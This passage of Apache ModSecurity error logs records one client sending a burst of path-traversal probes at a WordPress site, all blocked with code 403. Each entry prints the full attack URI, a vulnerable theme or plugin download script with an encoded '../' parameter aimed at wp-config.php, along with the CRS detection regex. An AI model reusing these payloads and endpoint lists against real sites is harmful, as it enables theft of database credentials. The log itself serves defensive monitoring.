"OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download/download.php"] [unique_id "Y0ZxKaBKlkjFPqrcdjM3iQAAAAw"] [Wed Oct 12 02:47:53.968092 2022] [:error] [pid 22337:tid 140534341363456] [client 185.189.115.30:49530] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/inc/download.php"] [unique_id "Y0ZxKaBKlkjFPqrcdjM3igAAABY"] [Wed Oct 12 02:47:54.118841 2022] [:error] [pid 22337:tid 140534391719680] [client 185.189.115.30:49532] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/includes/view-pdf.php?download=1&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/includes/view-pdf.php"] [unique_id "Y0ZxKqBKlkjFPqrcdjM3iwAAABA"] [Wed Oct 12 02:47:54.269500 2022] [:error] [pid 22337:tid 140534324578048] [client 185.189.115.30:49534] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/lib/scripts/download.php"] [unique_id "Y0ZxKqBKlkjFPqrcdjM3jAAAABg"] [Wed Oct 12 02:47:54.435837 2022] [:error] [pid 22339:tid 140534458861312] [client 185.189.115.30:49536] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/includes/download.php"] [unique_id "Y0ZxKtmZws0mEkXxGo-VEQAAAIg"] [Wed Oct 12 02:47:54.591843 2022] [:error] [pid 22972:tid 140534383326976] [client 185.189.115.30:49538] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/lib/downloadlink.php"] [unique_id "Y0ZxKuLrJ0tgpRmNRAaHZQAAANE"] [Wed Oct 12 02:47:54.742610 2022] [:error] [pid 22972:tid 140534580840192] [client 185.189.115.30:49540] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/functions/download.php"] [unique_id "Y0ZxKuLrJ0tgpRmNRAaHZgAAAMI"] [Wed Oct 12 02:47:54.894217 2022] [:error] [pid 22972:tid 140534341363456] [client 185.189.115.30:49542] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download.php"] [unique_id "Y0ZxKuLrJ0tgpRmNRAaHZwAAANY"] [Wed Oct 12 02:47:55.045024 2022] [:error] [pid 22972:tid 140534589232896] [client 185.189.115.30:49544] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/css/css.php"] [unique_id "Y0ZxK-LrJ0tgpRmNRAaHaAAAAME"] [Wed Oct 12 02:47:55.229585 2022] [:error] [pid 22339:tid 140534580840192] [client 185.189.115.30:49548] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/framework/utilities/download/getfile.php"] [unique_id "Y0ZxK9mZws0mEkXxGo-VEgAAAII"] [Wed Oct 12 02:48:11.991600 2022] [:error] [pid 22972:tid 140534400112384] [client 185.189.115.30:49602] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive.php?bkpwp_plugin_path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive.php"] [unique_id "Y0ZxO-LrJ0tgpRmNRAaHcQAAAM8"] [Wed Oct 12 02:48:12.142749 2022] [:error] [pid 22339:tid 140534332970752] [client 185.189.115.30:49604] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Predicate.php"] [unique_id "Y0ZxPNmZws0mEkXxGo-VFwAAAJc"] [Wed Oct 12 02:48:12.293153 2022] [:error] [pid 22339:tid 140534358148864] [client 185.189.115.30:49606] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Reader.php"] [unique_id "Y0ZxPNmZws0mEkXxGo-VGAAAAJQ"] [Wed Oct 12 02:48:12.459624 2022] [:error] [pid 22338:tid 140534391719680] [client 185.189.115.30:49608] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Writer.php"] [unique_id "Y0ZxPGINFIoIk7hPzpaZCwAAAFA"] [Wed Oct 12 02:48:12.645853 2022] [:error] [pid 22337:tid 140534458861312] [client 185.189.115.30:49610] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/Enigma2.php?boarddir=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/Enigma2.php"] [unique_id "Y0ZxPKBKlkjFPqrcdjM3kgAAAAg"] [Wed Oct 12 02:48:12.796817 2022] [:error] [pid 22972:tid 140534572447488] [client 185.189.115.30:49612] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/abtest/abtest_admin.php?action=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/abtest/abtest_admin.php"] [unique_id "Y0ZxPOLrJ0tgpRmNRAaHcgAAAMM"] [Wed Oct 12 02:48:12.947750 2022] [:error] [pid 22337:tid 140534580840192] [client 185.189.115.30:49614] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-custom-fields/core/actions/export.php?acf_abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-custom-fields/core/actions/export.php"] [unique_id "Y0ZxPKBKlkjFPqrcdjM3kwAAAAI"] [Wed Oct 12 02:48:13.098973 2022] [:error] [pid 22337:tid 140534442075904] [client 185.189.115.30:49616] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "Y0ZxPaBKlkjFPqrcdjM3lAAAAAo"] [Wed Oct 12 02:48:13.251294 2022] [:error] [pid 22972:tid 140534383326976] [client 185.189.115.30:49618] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php"] [unique_id "Y0ZxPeLrJ0tgpRmNRAaHcwAAANE"] [Wed Oct 12 02:48:13.402717 2022] [:error] [pid 22972:tid 140534408505088] [client 185.189.115.30:49620] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php?abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php"] [unique_id "Y0ZxPeLrJ0tgpRmNRAaHdAAAAM4"] [Wed Oct 12 02:48:13.556117 2022] [:error] [pid 22972:tid 140534589232896] [client 185.189.115.30:49622] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php"] [unique_id "Y0ZxPeLrJ0tgpRmNRAaHdQAAAME"] [Wed Oct 12 02:48:13.706878 2022] [:error] [pid 22338:tid 140534458861312] [client 185.189.115.30:49624] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/apptha-slider-gallery/asgallDownload.php?imgname=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/apptha-slider-gallery/asgallDownload.php"] [unique_id "Y0ZxPWINFIoIk7hPzpaZDAAAAEg"] [Wed Oct 12 02:48:13.857958 2022] [:error] [pid 22338:tid 140534408505088] [client 185.189.115.30:49626] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag 